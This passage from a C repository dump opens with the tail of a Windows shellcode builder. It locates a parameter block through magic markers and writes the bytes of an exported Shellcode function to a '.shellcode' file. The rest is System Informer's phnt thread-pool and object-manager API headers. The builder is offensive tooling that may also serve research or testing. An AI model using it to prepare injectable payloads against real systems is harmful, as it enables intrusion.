(;; pSearch--) 260 | { 261 | if (memeq(pSearch, pParams->magicNops, sizeof(pParams->magicNops))) 262 | { 263 | return pSearch; 264 | } 265 | } 266 | 267 | return NULL; 268 | } 269 | 270 | PSHELLCODE_PARAMS GetParams() 271 | { 272 | PUCHAR pSearch = (PUCHAR)WhereAmI(); 273 | 274 | for (;;pSearch++) 275 | { 276 | PSHELLCODE_PARAMS pCandidate = (PSHELLCODE_PARAMS)pSearch; 277 | 278 | if ((MAGIC1 == pCandidate->magic1) && (MAGIC2 == pCandidate->magic2)) 279 | { 280 | return pCandidate; 281 | } 282 | } 283 | 284 | return NULL; 285 | } 286 | 287 | BOOL EndShellcode() 288 | { 289 | return TRUE; 290 | } 291 | 292 | #include 293 | 294 | int main() 295 | { 296 | WCHAR myPath[MAX_PATH] = { 0, }; 297 | HMODULE hMe = GetModuleHandle(NULL); 298 | PUCHAR shellcodeStart = (PUCHAR)GetProcAddress(hMe, "Shellcode"); 299 | PUCHAR shellcodeEnd = (PUCHAR)GetProcAddress(hMe, "EndShellcode"); 300 | const SIZE_T shellcodeLength = (DWORD)(ULONG_PTR)(shellcodeEnd - shellcodeStart); 301 | HMODULE hFile = NULL; 302 | DWORD bytesWritten = 0; 303 | 304 | GetModuleFileNameW(NULL, myPath, ARRAYSIZE(myPath)); 305 | wcsncat(myPath, L".shellcode", ARRAYSIZE(myPath) - wcslen(myPath)); 306 | 307 | hFile = CreateFileW(myPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 308 | if (INVALID_HANDLE_VALUE == hFile) 309 | { 310 | printf(" [!] Failed to open output file: %ws\n", myPath); 311 | return 1; 312 | } 313 | if (!WriteFile(hFile, shellcodeStart, (DWORD)shellcodeLength, &bytesWritten, NULL) || 314 | (bytesWritten != shellcodeLength)) 315 | { 316 | printf(" [!] Failed to write shellcode with GLE %u\n", GetLastError()); 317 | return 1; 318 | } 319 | 320 | printf(" [+] Shellcode written to output file: %ws\n", myPath); 321 | 322 | return 0; 323 | } 324 | -------------------------------------------------------------------------------- /phnt/include/nttp.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Thread Pool support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTTP_H 8 | #define _NTTP_H 9 | 10 | // Some types are already defined in winnt.h. 11 | 12 | typedef struct _TP_ALPC TP_ALPC, *PTP_ALPC; 13 | 14 | // private 15 | typedef VOID (NTAPI *PTP_ALPC_CALLBACK)( 16 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 17 | _Inout_opt_ PVOID Context, 18 | _In_ PTP_ALPC Alpc 19 | ); 20 | 21 | // rev 22 | typedef VOID (NTAPI *PTP_ALPC_CALLBACK_EX)( 23 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 24 | _Inout_opt_ PVOID Context, 25 | _In_ PTP_ALPC Alpc, 26 | _In_ PVOID ApcContext 27 | ); 28 | 29 | #if (PHNT_VERSION >= PHNT_VISTA) 30 | 31 | // private 32 | _Check_return_ 33 | NTSYSAPI 34 | NTSTATUS 35 | NTAPI 36 | TpAllocPool( 37 | _Out_ PTP_POOL *PoolReturn, 38 | _Reserved_ PVOID Reserved 39 | ); 40 | 41 | // winbase:CloseThreadpool 42 | NTSYSAPI 43 | VOID 44 | NTAPI 45 | TpReleasePool( 46 | _Inout_ PTP_POOL Pool 47 | ); 48 | 49 | // winbase:SetThreadpoolThreadMaximum 50 | NTSYSAPI 51 | VOID 52 | NTAPI 53 | TpSetPoolMaxThreads( 54 | _Inout_ PTP_POOL Pool, 55 | _In_ ULONG MaxThreads 56 | ); 57 | 58 | // private 59 | NTSYSAPI 60 | NTSTATUS 61 | NTAPI 62 | TpSetPoolMinThreads( 63 | _Inout_ PTP_POOL Pool, 64 | _In_ ULONG MinThreads 65 | ); 66 | 67 | #if (PHNT_VERSION >= PHNT_WIN7) 68 | // rev 69 | NTSYSAPI 70 | NTSTATUS 71 | NTAPI 72 | TpQueryPoolStackInformation( 73 | _In_ PTP_POOL Pool, 74 | _Out_ PTP_POOL_STACK_INFORMATION PoolStackInformation 75 | ); 76 | #endif 77 | 78 | #if (PHNT_VERSION >= PHNT_WIN7) 79 | // rev 80 | NTSYSAPI 81 | NTSTATUS 82 | NTAPI 83 | TpSetPoolStackInformation( 84 | _Inout_ PTP_POOL Pool, 85 | _In_ PTP_POOL_STACK_INFORMATION PoolStackInformation 86 | ); 87 | #endif 88 | 89 | // private 90 | _Check_return_ 91 | NTSYSAPI 92 | NTSTATUS 93 | NTAPI 94 | TpAllocCleanupGroup( 95 | _Out_ PTP_CLEANUP_GROUP *CleanupGroupReturn 96 | ); 97 | 98 | // winbase:CloseThreadpoolCleanupGroup 99 | NTSYSAPI 100 | VOID 101 | NTAPI 102 | TpReleaseCleanupGroup( 103 | _Inout_ PTP_CLEANUP_GROUP CleanupGroup 104 | ); 105 | 106 | // winbase:CloseThreadpoolCleanupGroupMembers 107 | NTSYSAPI 108 | VOID 109 | NTAPI 110 | TpReleaseCleanupGroupMembers( 111 | _Inout_ PTP_CLEANUP_GROUP CleanupGroup, 112 | _In_ LOGICAL CancelPendingCallbacks, 113 | _Inout_opt_ PVOID CleanupParameter 114 | ); 115 | 116 | // winbase:SetEventWhenCallbackReturns 117 | NTSYSAPI 118 | VOID 119 | NTAPI 120 | TpCallbackSetEventOnCompletion( 121 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 122 | _In_ HANDLE Event 123 | ); 124 | 125 | // winbase:ReleaseSemaphoreWhenCallbackReturns 126 | NTSYSAPI 127 | VOID 128 | NTAPI 129 | TpCallbackReleaseSemaphoreOnCompletion( 130 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 131 | _In_ HANDLE Semaphore, 132 | _In_ ULONG ReleaseCount 133 | ); 134 | 135 | // winbase:ReleaseMutexWhenCallbackReturns 136 | NTSYSAPI 137 | VOID 138 | NTAPI 139 | TpCallbackReleaseMutexOnCompletion( 140 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 141 | _In_ HANDLE Mutex 142 | ); 143 | 144 | // winbase:LeaveCriticalSectionWhenCallbackReturns 145 | NTSYSAPI 146 | VOID 147 | NTAPI 148 | TpCallbackLeaveCriticalSectionOnCompletion( 149 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 150 | _Inout_ PRTL_CRITICAL_SECTION CriticalSection 151 | ); 152 | 153 | // winbase:FreeLibraryWhenCallbackReturns 154 | NTSYSAPI 155 | VOID 156 | NTAPI 157 | TpCallbackUnloadDllOnCompletion( 158 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 159 | _In_ PVOID DllHandle 160 | ); 161 | 162 | // winbase:CallbackMayRunLong 163 | NTSYSAPI 164 | NTSTATUS 165 | NTAPI 166 | TpCallbackMayRunLong( 167 | _Inout_ PTP_CALLBACK_INSTANCE Instance 168 | ); 169 | 170 | // winbase:DisassociateCurrentThreadFromCallback 171 | NTSYSAPI 172 | VOID 173 | NTAPI 174 | TpDisassociateCallback( 175 | _Inout_ PTP_CALLBACK_INSTANCE Instance 176 | ); 177 | 178 | // winbase:TrySubmitThreadpoolCallback 179 | _Check_return_ 180 | NTSYSAPI 181 | NTSTATUS 182 | NTAPI 183 | TpSimpleTryPost( 184 | _In_ PTP_SIMPLE_CALLBACK Callback, 185 | _Inout_opt_ PVOID Context, 186 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 187 | ); 188 | 189 | // private 190 | _Check_return_ 191 | NTSYSAPI 192 | NTSTATUS 193 | NTAPI 194 | TpAllocWork( 195 | _Out_ PTP_WORK *WorkReturn, 196 | _In_ PTP_WORK_CALLBACK Callback, 197 | _Inout_opt_ PVOID Context, 198 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 199 | ); 200 | 201 | // winbase:CloseThreadpoolWork 202 | NTSYSAPI 203 | VOID 204 | NTAPI 205 | TpReleaseWork( 206 | _Inout_ PTP_WORK Work 207 | ); 208 | 209 | // winbase:SubmitThreadpoolWork 210 | NTSYSAPI 211 | VOID 212 | NTAPI 213 | TpPostWork( 214 | _Inout_ PTP_WORK Work 215 | ); 216 | 217 | // winbase:WaitForThreadpoolWorkCallbacks 218 | NTSYSAPI 219 | VOID 220 | NTAPI 221 | TpWaitForWork( 222 | _Inout_ PTP_WORK Work, 223 | _In_ LOGICAL CancelPendingCallbacks 224 | ); 225 | 226 | // private 227 | _Check_return_ 228 | NTSYSAPI 229 | NTSTATUS 230 | NTAPI 231 | TpAllocTimer( 232 | _Out_ PTP_TIMER *Timer, 233 | _In_ PTP_TIMER_CALLBACK Callback, 234 | _Inout_opt_ PVOID Context, 235 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 236 | ); 237 | 238 | // winbase:CloseThreadpoolTimer 239 | NTSYSAPI 240 | VOID 241 | NTAPI 242 | TpReleaseTimer( 243 | _Inout_ PTP_TIMER Timer 244 | ); 245 | 246 | // winbase:SetThreadpoolTimer 247 | NTSYSAPI 248 | VOID 249 | NTAPI 250 | TpSetTimer( 251 | _Inout_ PTP_TIMER Timer, 252 | _In_opt_ PLARGE_INTEGER DueTime, 253 | _In_ ULONG Period, 254 | _In_opt_ ULONG WindowLength 255 | ); 256 | 257 | #if (PHNT_VERSION >= PHNT_WIN8) 258 | // winbase:SetThreadpoolTimerEx 259 | NTSYSAPI 260 | NTSTATUS 261 | NTAPI 262 | TpSetTimerEx( 263 | _Inout_ PTP_TIMER Timer, 264 | _In_opt_ PLARGE_INTEGER DueTime, 265 | _In_ ULONG Period, 266 | _In_opt_ ULONG WindowLength 267 | ); 268 | #endif 269 | 270 | // winbase:IsThreadpoolTimerSet 271 | NTSYSAPI 272 | LOGICAL 273 | NTAPI 274 | TpIsTimerSet( 275 | _In_ PTP_TIMER Timer 276 | ); 277 | 278 | // winbase:WaitForThreadpoolTimerCallbacks 279 | NTSYSAPI 280 | VOID 281 | NTAPI 282 | TpWaitForTimer( 283 | _Inout_ PTP_TIMER Timer, 284 | _In_ LOGICAL CancelPendingCallbacks 285 | ); 286 | 287 | // private 288 | _Check_return_ 289 | NTSYSAPI 290 | NTSTATUS 291 | NTAPI 292 | TpAllocWait( 293 | _Out_ PTP_WAIT *WaitReturn, 294 | _In_ PTP_WAIT_CALLBACK Callback, 295 | _Inout_opt_ PVOID Context, 296 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 297 | ); 298 | 299 | // winbase:CloseThreadpoolWait 300 | NTSYSAPI 301 | VOID 302 | NTAPI 303 | TpReleaseWait( 304 | _Inout_ PTP_WAIT Wait 305 | ); 306 | 307 | // winbase:SetThreadpoolWait 308 | NTSYSAPI 309 | VOID 310 | NTAPI 311 | TpSetWait( 312 | _Inout_ PTP_WAIT Wait, 313 | _In_opt_ HANDLE Handle, 314 | _In_opt_ PLARGE_INTEGER Timeout 315 | ); 316 | 317 | #if (PHNT_VERSION >= PHNT_WIN8) 318 | // winbase:SetThreadpoolWaitEx 319 | NTSYSAPI 320 | NTSTATUS 321 | NTAPI 322 | TpSetWaitEx( 323 | _Inout_ PTP_WAIT Wait, 324 | _In_opt_ HANDLE Handle, 325 | _In_opt_ PLARGE_INTEGER Timeout, 326 | _In_opt_ PVOID Reserved 327 | ); 328 | #endif 329 | 330 | // winbase:WaitForThreadpoolWaitCallbacks 331 | NTSYSAPI 332 | VOID 333 | NTAPI 334 | TpWaitForWait( 335 | _Inout_ PTP_WAIT Wait, 336 | _In_ LOGICAL CancelPendingCallbacks 337 | ); 338 | 339 | // private 340 | typedef VOID (NTAPI *PTP_IO_CALLBACK)( 341 | _Inout_ PTP_CALLBACK_INSTANCE Instance, 342 | _Inout_opt_ PVOID Context, 343 | _In_ PVOID ApcContext, 344 | _In_ PIO_STATUS_BLOCK IoSB, 345 | _In_ PTP_IO Io 346 | ); 347 | 348 | // private 349 | _Check_return_ 350 | NTSYSAPI 351 | NTSTATUS 352 | NTAPI 353 | TpAllocIoCompletion( 354 | _Out_ PTP_IO *IoReturn, 355 | _In_ HANDLE File, 356 | _In_ PTP_IO_CALLBACK Callback, 357 | _Inout_opt_ PVOID Context, 358 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 359 | ); 360 | 361 | // winbase:CloseThreadpoolIo 362 | NTSYSAPI 363 | VOID 364 | NTAPI 365 | TpReleaseIoCompletion( 366 | _Inout_ PTP_IO Io 367 | ); 368 | 369 | // winbase:StartThreadpoolIo 370 | NTSYSAPI 371 | VOID 372 | NTAPI 373 | TpStartAsyncIoOperation( 374 | _Inout_ PTP_IO Io 375 | ); 376 | 377 | // winbase:CancelThreadpoolIo 378 | NTSYSAPI 379 | VOID 380 | NTAPI 381 | TpCancelAsyncIoOperation( 382 | _Inout_ PTP_IO Io 383 | ); 384 | 385 | // winbase:WaitForThreadpoolIoCallbacks 386 | NTSYSAPI 387 | VOID 388 | NTAPI 389 | TpWaitForIoCompletion( 390 | _Inout_ PTP_IO Io, 391 | _In_ LOGICAL CancelPendingCallbacks 392 | ); 393 | 394 | // private 395 | NTSYSAPI 396 | NTSTATUS 397 | NTAPI 398 | TpAllocAlpcCompletion( 399 | _Out_ PTP_ALPC *AlpcReturn, 400 | _In_ HANDLE AlpcPort, 401 | _In_ PTP_ALPC_CALLBACK Callback, 402 | _Inout_opt_ PVOID Context, 403 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 404 | ); 405 | 406 | #if (PHNT_VERSION >= PHNT_WIN7) 407 | // rev 408 | NTSYSAPI 409 | NTSTATUS 410 | NTAPI 411 | TpAllocAlpcCompletionEx( 412 | _Out_ PTP_ALPC *AlpcReturn, 413 | _In_ HANDLE AlpcPort, 414 | _In_ PTP_ALPC_CALLBACK_EX Callback, 415 | _Inout_opt_ PVOID Context, 416 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 417 | ); 418 | #endif 419 | 420 | // private 421 | NTSYSAPI 422 | VOID 423 | NTAPI 424 | TpReleaseAlpcCompletion( 425 | _Inout_ PTP_ALPC Alpc 426 | ); 427 | 428 | // private 429 | NTSYSAPI 430 | VOID 431 | NTAPI 432 | TpWaitForAlpcCompletion( 433 | _Inout_ PTP_ALPC Alpc 434 | ); 435 | 436 | // private 437 | typedef enum _TP_TRACE_TYPE 438 | { 439 | TpTraceThreadPriority = 1, 440 | TpTraceThreadAffinity, 441 | MaxTpTraceType 442 | } TP_TRACE_TYPE; 443 | 444 | // private 445 | NTSYSAPI 446 | VOID 447 | NTAPI 448 | TpCaptureCaller( 449 | _In_ TP_TRACE_TYPE Type 450 | ); 451 | 452 | // private 453 | NTSYSAPI 454 | VOID 455 | NTAPI 456 | TpCheckTerminateWorker( 457 | _In_ HANDLE Thread 458 | ); 459 | 460 | #endif 461 | 462 | #endif 463 | -------------------------------------------------------------------------------- /phnt/include/ntobapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Object Manager support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTOBAPI_H 8 | #define _NTOBAPI_H 9 | 10 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 11 | #define OBJECT_TYPE_CREATE 0x0001 12 | #define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 13 | #endif 14 | 15 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 16 | #define DIRECTORY_QUERY 0x0001 17 | #define DIRECTORY_TRAVERSE 0x0002 18 | #define DIRECTORY_CREATE_OBJECT 0x0004 19 | #define DIRECTORY_CREATE_SUBDIRECTORY 0x0008 20 | #define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xf) 21 | #endif 22 | 23 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 24 | #define SYMBOLIC_LINK_QUERY 0x0001 25 | #define SYMBOLIC_LINK_SET 0x0002 26 | #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 27 | #define SYMBOLIC_LINK_ALL_ACCESS_EX (STANDARD_RIGHTS_REQUIRED | 0xFFFF) 28 | #endif 29 | 30 | #ifndef OBJ_PROTECT_CLOSE 31 | #define OBJ_PROTECT_CLOSE 0x00000001 32 | #endif 33 | #ifndef OBJ_INHERIT 34 | #define OBJ_INHERIT 0x00000002 35 | #endif 36 | #ifndef OBJ_AUDIT_OBJECT_CLOSE 37 | #define OBJ_AUDIT_OBJECT_CLOSE 0x00000004 38 | #endif 39 | 40 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 41 | typedef enum _OBJECT_INFORMATION_CLASS 42 | { 43 | ObjectBasicInformation, // q: OBJECT_BASIC_INFORMATION 44 | ObjectNameInformation, // q: OBJECT_NAME_INFORMATION 45 | ObjectTypeInformation, // q: OBJECT_TYPE_INFORMATION 46 | ObjectTypesInformation, // q: OBJECT_TYPES_INFORMATION 47 | ObjectHandleFlagInformation, // qs: OBJECT_HANDLE_FLAG_INFORMATION 48 | ObjectSessionInformation, // s: void // change object session // (requires SeTcbPrivilege) 49 | ObjectSessionObjectInformation, // s: void // change object session // (requires SeTcbPrivilege) 50 | MaxObjectInfoClass 51 | } OBJECT_INFORMATION_CLASS; 52 | #else 53 | #define ObjectBasicInformation 0 54 | #define ObjectNameInformation 1 55 | #define ObjectTypeInformation 2 56 | #define ObjectTypesInformation 3 57 | #define ObjectHandleFlagInformation 4 58 | #define ObjectSessionInformation 5 59 | #define ObjectSessionObjectInformation 6 60 | #endif 61 | 62 | typedef struct _OBJECT_BASIC_INFORMATION 63 | { 64 | ULONG Attributes; 65 | ACCESS_MASK GrantedAccess; 66 | ULONG HandleCount; 67 | ULONG PointerCount; 68 | ULONG PagedPoolCharge; 69 | ULONG NonPagedPoolCharge; 70 | ULONG Reserved[3]; 71 | ULONG NameInfoSize; 72 | ULONG TypeInfoSize; 73 | ULONG SecurityDescriptorSize; 74 | LARGE_INTEGER CreationTime; 75 | } OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; 76 | 77 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 78 | typedef struct _OBJECT_NAME_INFORMATION 79 | { 80 | UNICODE_STRING Name; 81 | } OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; 82 | #endif 83 | 84 | typedef struct _OBJECT_TYPE_INFORMATION 85 | { 86 | UNICODE_STRING TypeName; 87 | ULONG TotalNumberOfObjects; 88 | ULONG TotalNumberOfHandles; 89 | ULONG TotalPagedPoolUsage; 90 | ULONG TotalNonPagedPoolUsage; 91 | ULONG TotalNamePoolUsage; 92 | ULONG TotalHandleTableUsage; 93 | ULONG HighWaterNumberOfObjects; 94 | ULONG HighWaterNumberOfHandles; 95 | ULONG HighWaterPagedPoolUsage; 96 | ULONG HighWaterNonPagedPoolUsage; 97 | ULONG HighWaterNamePoolUsage; 98 | ULONG HighWaterHandleTableUsage; 99 | ULONG InvalidAttributes; 100 | GENERIC_MAPPING GenericMapping; 101 | ULONG ValidAccessMask; 102 | BOOLEAN SecurityRequired; 103 | BOOLEAN MaintainHandleCount; 104 | UCHAR TypeIndex; // since WINBLUE 105 | CHAR ReservedByte; 106 | ULONG PoolType; 107 | ULONG DefaultPagedPoolCharge; 108 | ULONG DefaultNonPagedPoolCharge; 109 | } OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; 110 | 111 | typedef struct _OBJECT_TYPES_INFORMATION 112 | { 113 | ULONG NumberOfTypes; 114 | } OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION; 115 | 116 | typedef struct _OBJECT_HANDLE_FLAG_INFORMATION 117 | { 118 | BOOLEAN Inherit; 119 | BOOLEAN ProtectFromClose; 120 | } OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; 121 | 122 | // Objects, handles 123 | 124 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 125 | 126 | NTSYSCALLAPI 127 | NTSTATUS 128 | NTAPI 129 | NtQueryObject( 130 | _In_opt_ HANDLE Handle, 131 | _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass, 132 | _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation, 133 | _In_ ULONG ObjectInformationLength, 134 | _Out_opt_ PULONG ReturnLength 135 | ); 136 | 137 | NTSYSCALLAPI 138 | NTSTATUS 139 | NTAPI 140 | NtSetInformationObject( 141 | _In_ HANDLE Handle, 142 | _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass, 143 | _In_reads_bytes_(ObjectInformationLength) PVOID ObjectInformation, 144 | _In_ ULONG ObjectInformationLength 145 | ); 146 | 147 | #define DUPLICATE_CLOSE_SOURCE 0x00000001 148 | #define DUPLICATE_SAME_ACCESS 0x00000002 149 | #define DUPLICATE_SAME_ATTRIBUTES 0x00000004 150 | 151 | NTSYSCALLAPI 152 | NTSTATUS 153 | NTAPI 154 | NtDuplicateObject( 155 | _In_ HANDLE SourceProcessHandle, 156 | _In_ HANDLE SourceHandle, 157 | _In_opt_ HANDLE TargetProcessHandle, 158 | _Out_opt_ PHANDLE TargetHandle, 159 | _In_ ACCESS_MASK DesiredAccess, 160 | _In_ ULONG HandleAttributes, 161 | _In_ ULONG Options 162 | ); 163 | 164 | NTSYSCALLAPI 165 | NTSTATUS 166 | NTAPI 167 | NtMakeTemporaryObject( 168 | _In_ HANDLE Handle 169 | ); 170 | 171 | NTSYSCALLAPI 172 | NTSTATUS 173 | NTAPI 174 | NtMakePermanentObject( 175 | _In_ HANDLE Handle 176 | ); 177 | 178 | NTSYSCALLAPI 179 | NTSTATUS 180 | NTAPI 181 | NtSignalAndWaitForSingleObject( 182 | _In_ HANDLE SignalHandle, 183 | _In_ HANDLE WaitHandle, 184 | _In_ BOOLEAN Alertable, 185 | _In_opt_ PLARGE_INTEGER Timeout 186 | ); 187 | 188 | NTSYSCALLAPI 189 | NTSTATUS 190 | NTAPI 191 | NtWaitForSingleObject( 192 | _In_ HANDLE Handle, 193 | _In_ BOOLEAN Alertable, 194 | _In_opt_ PLARGE_INTEGER Timeout 195 | ); 196 | 197 | NTSYSCALLAPI 198 | NTSTATUS 199 | NTAPI 200 | NtWaitForMultipleObjects( 201 | _In_ ULONG Count, 202 | _In_reads_(Count) HANDLE Handles[], 203 | _In_ WAIT_TYPE WaitType, 204 | _In_ BOOLEAN Alertable, 205 | _In_opt_ PLARGE_INTEGER Timeout 206 | ); 207 | 208 | #if (PHNT_VERSION >= PHNT_WS03) 209 | NTSYSCALLAPI 210 | NTSTATUS 211 | NTAPI 212 | NtWaitForMultipleObjects32( 213 | _In_ ULONG Count, 214 | _In_reads_(Count) LONG Handles[], 215 | _In_ WAIT_TYPE WaitType, 216 | _In_ BOOLEAN Alertable, 217 | _In_opt_ PLARGE_INTEGER Timeout 218 | ); 219 | #endif 220 | 221 | NTSYSCALLAPI 222 | NTSTATUS 223 | NTAPI 224 | NtSetSecurityObject( 225 | _In_ HANDLE Handle, 226 | _In_ SECURITY_INFORMATION SecurityInformation, 227 | _In_ PSECURITY_DESCRIPTOR SecurityDescriptor 228 | ); 229 | 230 | NTSYSCALLAPI 231 | NTSTATUS 232 | NTAPI 233 | NtQuerySecurityObject( 234 | _In_ HANDLE Handle, 235 | _In_ SECURITY_INFORMATION SecurityInformation, 236 | _Out_writes_bytes_opt_(Length) PSECURITY_DESCRIPTOR SecurityDescriptor, 237 | _In_ ULONG Length, 238 | _Out_ PULONG LengthNeeded 239 | ); 240 | 241 | NTSYSCALLAPI 242 | NTSTATUS 243 | NTAPI 244 | NtClose( 245 | _In_ _Post_ptr_invalid_ HANDLE Handle 246 | ); 247 | 248 | #if (PHNT_VERSION >= PHNT_THRESHOLD) 249 | NTSYSCALLAPI 250 | NTSTATUS 251 | NTAPI 252 | NtCompareObjects( 253 | _In_ HANDLE FirstObjectHandle, 254 | _In_ HANDLE SecondObjectHandle 255 | ); 256 | #endif 257 | 258 | #endif 259 | 260 | // Directory objects 261 | 262 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 263 | 264 | NTSYSCALLAPI 265 | NTSTATUS 266 | NTAPI 267 | NtCreateDirectoryObject( 268 | _Out_ PHANDLE DirectoryHandle, 269 | _In_ ACCESS_MASK DesiredAccess, 270 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 271 | ); 272 | 273 | #if (PHNT_VERSION >= PHNT_WIN8) 274 | NTSYSCALLAPI 275 | NTSTATUS 276 | NTAPI 277 | NtCreateDirectoryObjectEx( 278 | _Out_ PHANDLE DirectoryHandle, 279 | _In_ ACCESS_MASK DesiredAccess, 280 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 281 | _In_ HANDLE ShadowDirectoryHandle, 282 | _In_ ULONG Flags 283 | ); 284 | #endif 285 | 286 | NTSYSCALLAPI 287 | NTSTATUS 288 | NTAPI 289 | NtOpenDirectoryObject( 290 | _Out_ PHANDLE DirectoryHandle, 291 | _In_ ACCESS_MASK DesiredAccess, 292 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 293 | ); 294 | 295 | typedef struct _OBJECT_DIRECTORY_INFORMATION 296 | { 297 | UNICODE_STRING Name; 298 | UNICODE_STRING TypeName; 299 | } OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; 300 | 301 | NTSYSCALLAPI 302 | NTSTATUS 303 | NTAPI 304 | NtQueryDirectoryObject( 305 | _In_ HANDLE DirectoryHandle, 306 | _Out_writes_bytes_opt_(Length) PVOID Buffer, 307 | _In_ ULONG Length, 308 | _In_ BOOLEAN ReturnSingleEntry, 309 | _In_ BOOLEAN RestartScan, 310 | _Inout_ PULONG Context, 311 | _Out_opt_ PULONG ReturnLength 312 | ); 313 | 314 | #endif 315 | 316 | // Private namespaces 317 | 318 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 319 | 320 | #if (PHNT_VERSION >= PHNT_VISTA) 321 | 322 | // private 323 | typedef enum _BOUNDARY_ENTRY_TYPE 324 | { 325 | OBNS_Invalid, 326 | OBNS_Name, 327 | OBNS_SID, 328 | OBNS_IL 329 | } BOUNDARY_ENTRY_TYPE; 330 | 331 | // private 332 | typedef struct _OBJECT_BOUNDARY_ENTRY 333 | { 334 | BOUNDARY_ENTRY_TYPE EntryType; 335 | ULONG EntrySize; 336 | } OBJECT_BOUNDARY_ENTRY, *POBJECT_BOUNDARY_ENTRY; 337 | 338 | // rev 339 | #define OBJECT_BOUNDARY_DESCRIPTOR_VERSION 1 340 | 341 | // private 342 | typedef struct _OBJECT_BOUNDARY_DESCRIPTOR 343 | { 344 | ULONG Version; 345 | ULONG Items; 346 | ULONG TotalSize; 347 | union 348 | { 349 | ULONG Flags; 350 | struct 351 | { 352 | ULONG AddAppContainerSid : 1; 353 | ULONG Reserved : 31; 354 | }; 355 | }; 356 | } OBJECT_BOUNDARY_DESCRIPTOR, *POBJECT_BOUNDARY_DESCRIPTOR; 357 | 358 | NTSYSCALLAPI 359 | NTSTATUS 360 | NTAPI 361 | NtCreatePrivateNamespace( 362 | _Out_ PHANDLE NamespaceHandle, 363 | _In_ ACCESS_MASK DesiredAccess, 364 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 365 | _In_ POBJECT_BOUNDARY_DESCRIPTOR BoundaryDescriptor 366 | ); 367 | 368 | NTSYSCALLAPI 369 | NTSTATUS 370 | NTAPI 371 | NtOpenPrivateNamespace( 372 | _Out_ PHANDLE NamespaceHandle, 373 | _In_ ACCESS_MASK DesiredAccess, 374 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 375 | _In_ POBJECT_BOUNDARY_DESCRIPTOR BoundaryDescriptor 376 | ); 377 | 378 | NTSYSCALLAPI 379 | NTSTATUS 380 | NTAPI 381 | NtDeletePrivateNamespace( 382 | _In_ HANDLE NamespaceHandle 383 | ); 384 | 385 | #endif 386 | 387 | #endif 388 | 389 | // Symbolic links 390 | 391 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 392 | 393 | NTSYSCALLAPI 394 | NTSTATUS 395 | NTAPI 396 | NtCreateSymbolicLinkObject( 397 | _Out_ PHANDLE LinkHandle, 398 | _In_ ACCESS_MASK DesiredAccess, 399 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 400 | _In_ PUNICODE_STRING LinkTarget 401 | ); 402 | 403 | NTSYSCALLAPI 404 | NTSTATUS 405 | NTAPI 406 | NtOpenSymbolicLinkObject( 407 | _Out_ PHANDLE LinkHandle, 408 | _In_ ACCESS_MASK DesiredAccess, 409 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 410 | ); 411 | 412 | NTSYSCALLAPI 413 | NTSTATUS 414 | NTAPI 415 | NtQuerySymbolicLinkObject( 416 | _In_ HANDLE LinkHandle, 417 | _Inout_ PUNICODE_STRING LinkTarget, 418 | _Out_opt_ PULONG ReturnedLength 419 | ); 420 | 421 | typedef enum _SYMBOLIC_LINK_INFO_CLASS 422 | { 423 | SymbolicLinkGlobalInformation = 1, // s: ULONG 424 | SymbolicLinkAccessMask, // s: ACCESS_MASK 425 | MaxnSymbolicLinkInfoClass 426 | } SYMBOLIC_LINK_INFO_CLASS; 427 | 428 | #if (PHNT_VERSION >= PHNT_THRESHOLD) 429 | NTSYSCALLAPI 430 | NTSTATUS 431 | NTAPI 432 | NtSetInformationSymbolicLink( 433 | _In_ HANDLE LinkHandle, 434 | _In_ SYMBOLIC_LINK_INFO_CLASS SymbolicLinkInformationClass, 435 | _In_reads_bytes_(SymbolicLinkInformationLength) PVOID SymbolicLinkInformation, 436 | _In_ ULONG SymbolicLinkInformationLength 437 | ); 438 | #endif 439 | 440 | #endif 441 | 442 | #endif 443 | -------------------------------------------------------------------------------- 